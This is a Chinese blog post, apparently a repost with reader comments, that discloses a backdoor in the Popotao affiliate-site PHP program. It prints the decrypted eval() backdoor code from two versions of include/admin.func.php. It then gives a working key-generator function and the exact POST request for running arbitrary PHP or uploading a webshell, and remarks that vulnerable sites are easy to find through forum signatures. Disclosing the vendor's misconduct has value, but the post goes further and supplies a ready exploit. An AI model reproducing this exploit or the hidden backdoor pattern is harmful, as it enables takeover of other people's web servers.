泡泡淘是一个蛮不错的淘客建站程序,官方网址:http://www.popotao.com。
本人就是他们的用户之一,用他们的程序的网站是:http://www.xiaosajie.com
由于官方几个月不更新,跟不上淘宝API的更新速度,所以我想自己解决,把官方的6个ZEND加密过的PHP文件破解了。结果发现了极其恶心的事情。
在include/admin.func.php文件的最下面,发现以下代码,这是2012年9月27日的版本。妈的,ZEND加密保护版权还有网站授权认证无可厚非。但是利用加密加入后门。就太可耻了。
if ( isset( $_POST['_tks'] ) && ( $tks = trim( $_POST['_tks'] ) ) )
{
$_tks = explode( "|", ~base64_decode( strrev( substr( $tks, 3, 5 ). substr( $tks, 8 ) . substr( $tks, 0, 3 ) ) ) );
if ( trim( $_tks[1] ) == "K_".date( "Y_m_d" ) && ( strpos( $_SERVER['HTTP_HOST'], trim( $_tks[0] ) ) !== FALSE || strpos( $_SERVER['SERVER_NAME'], trim( $_tks[0] ) ) !== FALSE ) )
{
eval( $_POST['tao'] );
}
exit( );
}
后来2月4号跟官方交涉,官方还死不承认,但是在之后的几个小时内。马上更新了补丁。也就是20130204的版本。还是信不过。继续解密。发现仍不思悔改。只不过提交的参数名变了。在程序里留个后门。对用户是多么的不负责。再次鄙视。后门代码还是include/admin.func.php文件里的最下面。
if ( isset( $_POST['_MDFK'] ) && ( $tks = trim( $_POST['_MDFK'] ) ) )
{
$_tks = explode( "|", ~base64_decode( strrev( substr( $tks, 3, 5 ). substr( $tks, 8 ) . substr( $tks, 0, 3 ) ) ) );
if ( trim( $_tks[1] ) == "K_".date( "Y_m_d" ) && ( strpos( $_SERVER['HTTP_HOST'], trim( $_tks[0] ) ) !== FALSE || strpos( $_SERVER['SERVER_NAME'], trim( $_tks[0] ) ) !== FALSE ) )
{
eval( $_POST['_HkBs'] );
}
exit( );
}
既然对用户这么不负责,那我只有公布泡泡淘的丑陋行径了。如果只是漏洞,可以不公布利用方法,但是这里是官方留下的后门。那就一定要给出利用方法。
里用原理就是提交一个字符串,然后通过了域名和时间的验证,顺利到达eval这里。活生生的一句话后门。不搞安全的可能不知道。我只需要说,有这句代码,控制你们网站的服务器。真的没什么问题。把PID什么的改掉。你的网站就帮别人赚钱吧。
function getfuckkey($domain = ''){
$time = 'K_'.date("Y_m_d");
//$domain = $_SERVER['HTTP_HOST'];
if ($domain) {
$key = $domain.'|'.$time;
$key2 = base64_encode(~$key);
$key3 = strrev($key2);
$k1 = substr( $key3, 0, 5 );
$k2 = substr( $key3, 5, -3 );
$k3 = substr( $key3, -3 );
$key4 = $k3.$k1.$k2;
return $key4;
} else {
return '';
}
}
echo getfuckkey('xiaosajie.com');
这样可以得到字符串,然后post方式,注意必须POST方式提交,提交到include/admin.func.php?_MDFK={key}&_HkBs=phpinfo()
就可以查看phpinfo();或者直接上传大马,随便了。
泡泡淘的用户很多,在官方论坛里,很多人的帖子签名都有网站。随便搞就是一大堆。
本文附件上,有本人和官方的QQ对话、对话后有文件被修改的截图以及利用程序。
2月4号和官方交涉后,2月6号,我的文件就被修改过。整个网站就打不开了。不用说也能想到是什么人做的了。本文发出前,本人的xiaosajie.com已经将官方后门处理掉了,程序完全改写,xiaosajie.com已经不是泡泡淘的程序了,完全自主开发。没有后台,所以各位黑客大哥不需要来这里测试。
最后预祝大家蛇年行大运。4ngel给各位拜年了。
fr0m:4ngel's Blog
博主这么给力,强悍,膜拜ing
@钛棒 你那棒棒也厉害的
楼主的行为实在太COOL了!!!
对待这样无耻的商家,就一定要将其无耻的行经公之于众!
@ScotGu 好吧,这是天使黑阔
博主啊.转载的地址加个超链接嘛.像那个留后门的就完全可以不用加超链接了.
@猫大叔 要去膜拜下天使大大吗
没用过这个CMS,不过博主域名很霸气,博客名字很诗意··
@朽木 谢谢夸奖,欢迎来访啊!
好吧,我看不懂加密的代码。
@黎健雄 +1